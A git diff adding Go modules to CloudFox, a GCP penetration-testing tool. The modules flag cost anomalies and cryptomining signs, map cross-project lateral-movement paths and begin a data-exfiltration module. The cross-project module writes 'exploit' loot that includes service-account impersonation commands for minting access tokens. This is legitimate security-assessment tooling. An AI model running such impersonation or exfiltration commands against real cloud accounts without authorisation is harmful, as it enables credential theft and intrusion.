indicators = append(indicators, indicator) + } + } + + // Add indicators to tracking + m.mu.Lock() + for _, ind := range indicators { + m.Cryptomining = append(m.Cryptomining, ind) + m.cryptoIndicators++ + + // Add to loot + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## CRYPTOMINING INDICATOR: %s (Project: %s)\n"+ + "# Location: %s | Type: %s\n"+ + "# Investigate instance:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "# Stop instance if suspicious:\n"+ + "gcloud compute instances stop %s --zone=%s --project=%s\n\n", + ind.Name, ind.ProjectID, + ind.Location, ind.Indicator, + ind.Name, ind.Location, ind.ProjectID, + ind.Name, ind.Location, ind.ProjectID, + ) + } + m.mu.Unlock() +} + +func (m *CostSecurityModule) checkUnusualCreation(instance *compute.Instance, projectID, zone string, estCost float64) { + createdTime, err := time.Parse(time.RFC3339, instance.CreationTimestamp) + if err != nil { + return + } + + // Check if created during unusual hours (midnight to 5am local, or weekends) + hour := createdTime.Hour() + weekday := createdTime.Weekday() + + if (hour >= 0 && hour <= 5) || weekday == time.Saturday || weekday == time.Sunday { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unusual-creation", + Severity: "MEDIUM", + Details: fmt.Sprintf("Instance created at unusual time: %s", createdTime.Format("Mon 2006-01-02 15:04")), + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: "Verify this instance creation was authorized", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } +} + +func (m *CostSecurityModule) findOrphanedDisks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + 
for zone, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + // Check if disk is attached to any instance + if len(disk.Users) == 0 { + estCost := m.estimateDiskCost(disk.SizeGb, disk.Type) + + orphaned := OrphanedResource{ + Name: disk.Name, + ProjectID: projectID, + ResourceType: "compute-disk", + Location: m.extractZoneFromURL(zone), + SizeGB: disk.SizeGb, + Status: disk.Status, + CreatedTime: disk.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Disk not attached to any instance", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + // Add cleanup command to loot + m.mu.Lock() + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## ORPHANED DISK: %s (Project: %s)\n"+ + "# Size: %dGB | Est. Cost: $%.2f/month\n"+ + "# Delete orphaned disk:\n"+ + "gcloud compute disks delete %s --zone=%s --project=%s\n\n", + disk.Name, projectID, + disk.SizeGb, estCost, + disk.Name, m.extractZoneFromURL(zone), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) + } +} + +func (m *CostSecurityModule) findOrphanedIPs(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // Global addresses + req := computeService.Addresses.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.AddressAggregatedList) error { + for region, addressList := range page.Items { + if addressList.Addresses == nil { + continue + } + for _, addr := range addressList.Addresses { + // Check if address is in use + if addr.Status == "RESERVED" && len(addr.Users) == 0 { + // Static IP costs ~$7.2/month when not in use + estCost := 7.2 + + orphaned := OrphanedResource{ + Name: addr.Name, + ProjectID: projectID, + 
ResourceType: "static-ip", + Location: m.extractRegionFromURL(region), + Status: addr.Status, + CreatedTime: addr.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Static IP reserved but not attached", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + m.mu.Lock() + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## ORPHANED IP: %s (Project: %s)\n"+ + "# Address: %s | Est. Cost: $%.2f/month\n"+ + "# Release static IP:\n"+ + "gcloud compute addresses delete %s --region=%s --project=%s\n\n", + addr.Name, projectID, + addr.Address, estCost, + addr.Name, m.extractRegionFromURL(region), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate addresses in project %s", projectID)) + } +} + +func (m *CostSecurityModule) analyzeSQLInstances(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances.Items { + // Check for stopped but still provisioned instances (still incur storage costs) + if instance.State == "SUSPENDED" { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "idle", + Severity: "MEDIUM", + Details: "Cloud SQL instance is suspended but still incurs storage costs", + Location: instance.Region, + Remediation: "Consider deleting if not needed, or start if needed for operations", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for high-tier instances 
without labels + if instance.Settings != nil && strings.Contains(instance.Settings.Tier, "db-custom") { + if instance.Settings.UserLabels == nil || len(instance.Settings.UserLabels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: fmt.Sprintf("High-tier Cloud SQL instance (%s) has no cost allocation labels", instance.Settings.Tier), + Location: instance.Region, + Remediation: fmt.Sprintf("gcloud sql instances patch %s --update-labels=cost-center=UNKNOWN,owner=UNKNOWN", instance.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +func (m *CostSecurityModule) analyzeStorageBuckets(ctx context.Context, projectID string, storageService *storage.Service, logger internal.Logger) { + buckets, err := storageService.Buckets.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate storage buckets in project %s", projectID)) + return + } + + for _, bucket := range buckets.Items { + // Check for buckets without labels + if len(bucket.Labels) == 0 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: projectID, + ResourceType: "storage-bucket", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Storage bucket has no cost allocation labels", + Location: bucket.Location, + Remediation: fmt.Sprintf("gsutil label ch -l cost-center:UNKNOWN gs://%s", bucket.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for multi-regional buckets with nearline/coldline (unusual pattern) + if bucket.StorageClass == "NEARLINE" || bucket.StorageClass == "COLDLINE" { + if strings.Contains(strings.ToUpper(bucket.Location), "DUAL") || len(bucket.Location) <= 4 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: 
projectID, + ResourceType: "storage-bucket", + AnomalyType: "suboptimal-config", + Severity: "LOW", + Details: fmt.Sprintf("Multi-regional bucket with %s storage (consider single region for cost)", bucket.StorageClass), + Location: bucket.Location, + Remediation: "Consider using single-region buckets for archival storage", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *CostSecurityModule) extractMachineTypeName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *CostSecurityModule) extractZoneFromURL(url string) string { + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +func (m *CostSecurityModule) extractRegionFromURL(url string) string { + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +func (m *CostSecurityModule) parseMachineType(machineType string) (vcpus int64, memGB float64) { + // Common machine type patterns + // n1-standard-4: 4 vCPUs, 15 GB + // e2-medium: 2 vCPUs, 4 GB + // custom-8-32768: 8 vCPUs, 32 GB + + switch { + case strings.HasPrefix(machineType, "custom-"): + // Parse custom machine type + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[1], "%d", &vcpus) + var memMB int64 + fmt.Sscanf(parts[2], "%d", &memMB) + memGB = float64(memMB) / 1024 + } + case strings.HasPrefix(machineType, "n1-"): + vcpuMap := map[string]int64{ + "n1-standard-1": 1, "n1-standard-2": 2, "n1-standard-4": 4, + "n1-standard-8": 8, "n1-standard-16": 16, "n1-standard-32": 32, + "n1-standard-64": 64, 
"n1-standard-96": 96, + "n1-highmem-2": 2, "n1-highmem-4": 4, "n1-highmem-8": 8, + "n1-highmem-16": 16, "n1-highmem-32": 32, "n1-highmem-64": 64, + "n1-highcpu-2": 2, "n1-highcpu-4": 4, "n1-highcpu-8": 8, + "n1-highcpu-16": 16, "n1-highcpu-32": 32, "n1-highcpu-64": 64, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 3.75 // Standard ratio + case strings.HasPrefix(machineType, "e2-"): + vcpuMap := map[string]int64{ + "e2-micro": 2, "e2-small": 2, "e2-medium": 2, + "e2-standard-2": 2, "e2-standard-4": 4, "e2-standard-8": 8, + "e2-standard-16": 16, "e2-standard-32": 32, + "e2-highmem-2": 2, "e2-highmem-4": 4, "e2-highmem-8": 8, + "e2-highmem-16": 16, + "e2-highcpu-2": 2, "e2-highcpu-4": 4, "e2-highcpu-8": 8, + "e2-highcpu-16": 16, "e2-highcpu-32": 32, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 4 // Approximate + case strings.HasPrefix(machineType, "n2-") || strings.HasPrefix(machineType, "n2d-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + case strings.HasPrefix(machineType, "c2-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + default: + vcpus = 2 + memGB = 4 + } + + return vcpus, memGB +} + +func (m *CostSecurityModule) estimateInstanceCost(machineType string, vcpus int64, memGB float64, gpuCount int) float64 { + // Rough monthly estimates based on on-demand pricing in us-central1 + // Actual costs vary by region and commitment + + baseCost := float64(vcpus)*25 + memGB*3 // Rough per-vCPU and per-GB costs + + // GPU costs (rough estimates) + if gpuCount > 0 { + baseCost += float64(gpuCount) * 400 // ~$400/month per GPU + } + + // Adjust for machine type efficiency + if strings.HasPrefix(machineType, "e2-") { + baseCost *= 0.7 // E2 is cheaper + } else if strings.HasPrefix(machineType, "c2-") { + baseCost *= 1.2 // C2 is more expensive + } + + return 
baseCost +} + +func (m *CostSecurityModule) estimateDiskCost(sizeGB int64, diskType string) float64 { + // Rough monthly estimates per GB + // pd-standard: $0.04/GB, pd-ssd: $0.17/GB, pd-balanced: $0.10/GB + + pricePerGB := 0.04 + if strings.Contains(diskType, "ssd") { + pricePerGB = 0.17 + } else if strings.Contains(diskType, "balanced") { + pricePerGB = 0.10 + } + + return float64(sizeGB) * pricePerGB +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CostSecurityModule) initializeLootFiles() { + m.LootMap["cost-security-commands"] = &internal.LootFile{ + Name: "cost-security-commands", + Contents: "# Cost Security Commands\n# Generated by CloudFox\n# Review before executing!\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main cost-security table (combines cryptomining, orphaned, and anomalies) + mainHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Issue", + "Est. 
Cost/Mo", + } + + var mainBody [][]string + + // Add cryptomining indicators + for _, c := range m.Cryptomining { + mainBody = append(mainBody, []string{ + c.ProjectID, + m.GetProjectName(c.ProjectID), + c.Name, + c.ResourceType, + c.Location, + fmt.Sprintf("cryptomining: %s", c.Indicator), + "-", + }) + } + + // Add orphaned resources + for _, o := range m.Orphaned { + mainBody = append(mainBody, []string{ + o.ProjectID, + m.GetProjectName(o.ProjectID), + o.Name, + o.ResourceType, + o.Location, + "orphaned", + fmt.Sprintf("$%.2f", o.EstCostMonth), + }) + } + + // Add cost anomalies + for _, a := range m.CostAnomalies { + mainBody = append(mainBody, []string{ + a.ProjectID, + m.GetProjectName(a.ProjectID), + a.Name, + a.ResourceType, + a.Location, + a.AnomalyType, + fmt.Sprintf("$%.2f", a.EstCostMonth), + }) + + // Add remediation to loot + if a.Remediation != "" { + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## %s: %s (Project: %s)\n# %s\n%s\n\n", + strings.ToUpper(a.AnomalyType), a.Name, a.ProjectID, a.Details, a.Remediation, + ) + } + } + + // Expensive Resources table (keep separate due to different structure) + expensiveHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Location", + "Machine Type", + "vCPUs", + "Memory GB", + "GPUs", + "Labeled", + "Est. 
Cost/Mo", + } + + var expensiveBody [][]string + for _, e := range m.Expensive { + labeled := "No" + if len(e.Labels) > 0 { + labeled = "Yes" + } + + expensiveBody = append(expensiveBody, []string{ + e.ProjectID, + m.GetProjectName(e.ProjectID), + e.Name, + e.Location, + e.MachineType, + fmt.Sprintf("%d", e.VCPUs), + fmt.Sprintf("%.1f", e.MemoryGB), + fmt.Sprintf("%d", e.GPUs), + labeled, + fmt.Sprintf("$%.2f", e.EstCostMonth), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Review before executing!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(mainBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security", + Header: mainHeader, + Body: mainBody, + }) + } + + if len(expensiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security-expensive", + Header: expensiveHeader, + Body: expensiveBody, + }) + } + + output := CostSecurityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_COSTSECURITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go new file mode 100644 index 00000000..c25e9e01 --- /dev/null +++ b/gcp/commands/crossproject.go @@ -0,0 +1,468 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + crossprojectservice "github.com/BishopFox/cloudfox/gcp/services/crossProjectService" + 
"github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCrossProjectCommand = &cobra.Command{ + Use: globals.GCP_CROSSPROJECT_MODULE_NAME, + Aliases: []string{"cross-project", "xproject", "lateral"}, + Short: "Analyze cross-project access patterns for lateral movement", + Long: `Analyze cross-project IAM bindings to identify lateral movement paths. + +This module is designed for penetration testing and identifies: +- Service accounts with access to multiple projects +- Cross-project IAM role bindings +- Potential lateral movement paths between projects + +Features: +- Maps cross-project service account access +- Identifies high-risk cross-project roles (owner, editor, admin) +- Generates exploitation commands for lateral movement +- Highlights service accounts spanning trust boundaries + +Risk Analysis: +- CRITICAL: Owner/Editor/Admin roles across projects +- HIGH: Sensitive admin roles (IAM, Secrets, Compute) +- MEDIUM: Standard roles with cross-project access +- LOW: Read-only cross-project access + +WARNING: Requires multiple projects to be specified for effective analysis. 
+Use -p for single project or -l for project list file.`, + Run: runGCPCrossProjectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CrossProjectModule struct { + gcpinternal.BaseGCPModule + + CrossBindings []crossprojectservice.CrossProjectBinding + CrossProjectSAs []crossprojectservice.CrossProjectServiceAccount + LateralMovementPaths []crossprojectservice.LateralMovementPath + LootMap map[string]*internal.LootFile +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CrossProjectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CrossProjectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CrossProjectOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCrossProjectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CROSSPROJECT_MODULE_NAME) + if err != nil { + return + } + + if len(cmdCtx.ProjectIDs) < 2 { + cmdCtx.Logger.InfoM("Cross-project analysis works best with multiple projects. 
Consider using -l to specify a project list.", globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + module := &CrossProjectModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CrossBindings: []crossprojectservice.CrossProjectBinding{}, + CrossProjectSAs: []crossprojectservice.CrossProjectServiceAccount{}, + LateralMovementPaths: []crossprojectservice.LateralMovementPath{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Analyzing cross-project access patterns across %d project(s)...", len(m.ProjectIDs)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + svc := crossprojectservice.New() + + // Analyze cross-project bindings + bindings, err := svc.AnalyzeCrossProjectAccess(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not analyze cross-project access") + } else { + m.CrossBindings = bindings + } + + // Get cross-project service accounts + sas, err := svc.GetCrossProjectServiceAccounts(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not get cross-project service accounts") + } else { + m.CrossProjectSAs = sas + } + + // Find lateral movement paths + paths, err := svc.FindLateralMovementPaths(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find lateral movement paths") + } else { + m.LateralMovementPaths = paths + } + + if len(m.CrossBindings) == 0 && len(m.CrossProjectSAs) == 0 && len(m.LateralMovementPaths) == 0 { + logger.InfoM("No cross-project access patterns found", 
globals.GCP_CROSSPROJECT_MODULE_NAME) + return + } + + // Count high-risk findings + criticalCount := 0 + highCount := 0 + for _, binding := range m.CrossBindings { + switch binding.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + m.addBindingToLoot(binding) + } + + for _, sa := range m.CrossProjectSAs { + m.addServiceAccountToLoot(sa) + } + + for _, path := range m.LateralMovementPaths { + m.addLateralMovementToLoot(path) + } + + logger.SuccessM(fmt.Sprintf("Found %d cross-project binding(s), %d cross-project SA(s), %d lateral movement path(s)", + len(m.CrossBindings), len(m.CrossProjectSAs), len(m.LateralMovementPaths)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + if criticalCount > 0 || highCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk cross-project bindings!", criticalCount, highCount), globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CrossProjectModule) initializeLootFiles() { + m.LootMap["crossproject-exploit-commands"] = &internal.LootFile{ + Name: "crossproject-exploit-commands", + Contents: "# Cross-Project Exploit Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["crossproject-enum-commands"] = &internal.LootFile{ + Name: "crossproject-enum-commands", + Contents: "# Cross-Project Enumeration Commands\n# External/Cross-Tenant principals with access to your projects\n# Generated by CloudFox\n\n", + } +} + +func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossProjectBinding) { + // Add exploitation commands + if len(binding.ExploitCommands) > 0 { + m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + "# %s -> %s (Principal: %s, Role: %s)\n", + binding.SourceProject, binding.TargetProject, binding.Principal, binding.Role, + ) + for _, cmd := range binding.ExploitCommands { + 
m.LootMap["crossproject-exploit-commands"].Contents += cmd + "\n" + } + m.LootMap["crossproject-exploit-commands"].Contents += "\n" + } + + // Check for cross-tenant/external access + if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { + m.LootMap["crossproject-enum-commands"].Contents += fmt.Sprintf( + "# External Principal: %s\n"+ + "# Target Project: %s\n"+ + "# Role: %s\n", + binding.Principal, + binding.TargetProject, + binding.Role, + ) + + // External service accounts - add check command + if strings.Contains(binding.Principal, "serviceAccount:") { + m.LootMap["crossproject-enum-commands"].Contents += fmt.Sprintf( + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'\n", + binding.TargetProject, + strings.TrimPrefix(binding.Principal, "serviceAccount:"), + ) + } + m.LootMap["crossproject-enum-commands"].Contents += "\n" + } +} + +// isCrossTenantPrincipal checks if a principal is from outside the organization +func isCrossTenantPrincipal(principal string, projectIDs []string) bool { + // Extract service account email + email := strings.TrimPrefix(principal, "serviceAccount:") + email = strings.TrimPrefix(email, "user:") + email = strings.TrimPrefix(email, "group:") + + // Check if the email domain is gserviceaccount.com (service account) + if strings.Contains(email, "@") && strings.Contains(email, ".iam.gserviceaccount.com") { + // Extract project from SA email + // Format: NAME@PROJECT.iam.gserviceaccount.com + parts := strings.Split(email, "@") + if len(parts) == 2 { + domain := parts[1] + saProject := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + + // Check if SA's project is in our project list + for _, p := range projectIDs { + if p == saProject { + return false // It's from within our organization + } + } + return true // External SA + } + } + + // Check for compute/appspot service accounts + if strings.Contains(email, "-compute@developer.gserviceaccount.com") || + strings.Contains(email, 
"@appspot.gserviceaccount.com") { + // Extract project number/ID + parts := strings.Split(email, "@") + if len(parts) == 2 { + projectPart := strings.Split(parts[0], "-")[0] + for _, p := range projectIDs { + if strings.Contains(p, projectPart) { + return false + } + } + return true + } + } + + // For regular users, check domain + if strings.Contains(email, "@") && !strings.Contains(email, "gserviceaccount.com") { + // Can't determine organization from email alone + return false + } + + return false +} + +func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { + // Add impersonation commands for cross-project SAs + m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + "# Cross-project SA: %s (Home: %s)\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + sa.Email, sa.ProjectID, sa.Email, + ) +} + +func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.LateralMovementPath) { + // Add lateral movement exploitation commands + m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + "# Lateral Movement: %s -> %s\n"+ + "# Principal: %s\n"+ + "# Method: %s\n"+ + "# Target Roles: %s\n", + path.SourceProject, path.TargetProject, + path.SourcePrincipal, + path.AccessMethod, + strings.Join(path.TargetRoles, ", "), + ) + + if len(path.ExploitCommands) > 0 { + for _, cmd := range path.ExploitCommands { + m.LootMap["crossproject-exploit-commands"].Contents += cmd + "\n" + } + } + m.LootMap["crossproject-exploit-commands"].Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Cross-project bindings table + // Reads: Source principal from source project has role on target project + bindingsHeader := []string{ + "Source Project Name", + "Source Project ID", + "Source Principal", + "Source Principal 
Type", + "Action", + "Target Project Name", + "Target Project ID", + "Target Role", + "External", + } + + var bindingsBody [][]string + for _, binding := range m.CrossBindings { + // Check if external/cross-tenant + external := "No" + if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { + external = "Yes" + } + + // Action is always "direct IAM binding" for cross-project bindings + action := "direct IAM binding" + + bindingsBody = append(bindingsBody, []string{ + m.GetProjectName(binding.SourceProject), + binding.SourceProject, + binding.Principal, + binding.PrincipalType, + action, + m.GetProjectName(binding.TargetProject), + binding.TargetProject, + binding.Role, + external, + }) + } + + // Cross-project service accounts table + // Reads: Source SA from source project has access to target projects + sasHeader := []string{ + "Source Project Name", + "Source Project ID", + "Source Service Account", + "Action", + "Target Project Count", + "Target Access (project:role)", + } + + var sasBody [][]string + for _, sa := range m.CrossProjectSAs { + // Count unique target projects + projectSet := make(map[string]bool) + for _, access := range sa.TargetAccess { + parts := strings.Split(access, ":") + if len(parts) > 0 { + projectSet[parts[0]] = true + } + } + + // Action describes how the SA has cross-project access + action := "cross-project access" + + // Join target access with newlines for readability + accessList := strings.Join(sa.TargetAccess, "\n") + + sasBody = append(sasBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + action, + fmt.Sprintf("%d", len(projectSet)), + accessList, + }) + } + + // Lateral movement paths table + // Reads: Source principal from source project can move to target project via method + pathsHeader := []string{ + "Source Project Name", + "Source Project ID", + "Source Principal", + "Action", + "Target Project Name", + "Target Project ID", + "Target Roles", + } + + var pathsBody [][]string + for _, path 
:= range m.LateralMovementPaths { + // Use access method as action (human-readable) + action := path.AccessMethod + + // Join roles with newlines for readability + roles := strings.Join(path.TargetRoles, "\n") + + pathsBody = append(pathsBody, []string{ + m.GetProjectName(path.SourceProject), + path.SourceProject, + path.SourcePrincipal, + action, + m.GetProjectName(path.TargetProject), + path.TargetProject, + roles, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + var tables []internal.TableFile + + if len(bindingsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cross-project-bindings", + Header: bindingsHeader, + Body: bindingsBody, + }) + } + + if len(sasBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cross-project-sas", + Header: sasHeader, + Body: sasBody, + }) + } + + if len(pathsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-movement-paths", + Header: pathsHeader, + Body: pathsBody, + }) + } + + output := CrossProjectOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go new file mode 100644 index 00000000..ff4ce4d2 --- /dev/null +++ b/gcp/commands/dataexfiltration.go @@ -0,0 +1,641 @@ +package commands + +import ( + "context" + "fmt" + 
"strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + compute "google.golang.org/api/compute/v1" + storage "google.golang.org/api/storage/v1" +) + +// Module name constant +const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" + +var GCPDataExfiltrationCommand = &cobra.Command{ + Use: GCP_DATAEXFILTRATION_MODULE_NAME, + Aliases: []string{"exfil", "data-exfil", "exfiltration"}, + Short: "Identify data exfiltration paths and high-risk data exposure", + Long: `Identify data exfiltration vectors and paths in GCP environments. + +Features: +- Finds public snapshots and images +- Identifies export capabilities (BigQuery, GCS) +- Maps Pub/Sub push endpoints (external data flow) +- Finds logging sinks to external destinations +- Identifies publicly accessible storage +- Analyzes backup export configurations +- Generates exploitation commands for penetration testing + +This module helps identify how data could be exfiltrated from the environment +through various GCP services.`, + Run: runGCPDataExfiltrationCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ExfiltrationPath struct { + PathType string // "snapshot", "bucket", "pubsub", "logging", "bigquery", "image" + ResourceName string + ProjectID string + Description string + Destination string // Where data can go + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string + ExploitCommand string +} + +type PublicExport struct { + ResourceType string + ResourceName string + ProjectID string + AccessLevel string // "public", "allAuthenticatedUsers", "specific_domain" + DataType string // "snapshot", "image", "bucket", "dataset" + Size string + RiskLevel string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DataExfiltrationModule struct { + 
